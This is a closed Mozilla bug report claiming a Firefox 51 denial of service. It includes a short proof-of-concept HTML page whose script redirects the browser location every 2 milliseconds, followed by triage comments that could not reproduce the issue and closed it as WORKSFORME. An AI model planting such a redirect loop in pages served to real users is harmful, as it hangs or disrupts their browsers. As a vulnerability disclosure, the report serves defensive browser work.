Closed Bug 1336913 Opened 7 years ago Closed 3 years ago

Denial of Service attack via location

Categories

(Core :: DOM: Core & HTML, defect, P5)

Product:
Core
Component:
DOM: Core & HTML
Version:
51 Branch
Type:
defect

Tracking

()

Status:
RESOLVED WORKSFORME

People

(Reporter: mishra.dhiraj95, Unassigned)

Details

Attachments

(1 file)

start.html
132 bytes, text/html
Details
Attached file start.html 
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Build ID: 20170125094131

Steps to reproduce:

Steps to reproduce:
1. Open start.html 
2. Trying using mozilla. 


Actual results:

<html>
<title></title>
<script>
function d()
{
location = "https://datarift.blogspot.in"
}
setInterval("d()", 2);
</script>
</html>
I am not able to reproduce this in Nightly FF its work perfect for me in Stable and Beta in Windows 7 
and Linux OS.
DOS bugs aren't kept private, opening.
Group: firefox-core-security
When reporting bugs like that, could you test in Nightly to know if the issue has been already fixed (sometimes it's the case) and test with mozregression (with flag --find-fix) to find a working range.
Component: Untriaged → DOM
Product: Firefox → Core
Priority: -- → P5
Component: DOM → DOM: Core & HTML
Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Resolution: --- → WORKSFORME
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: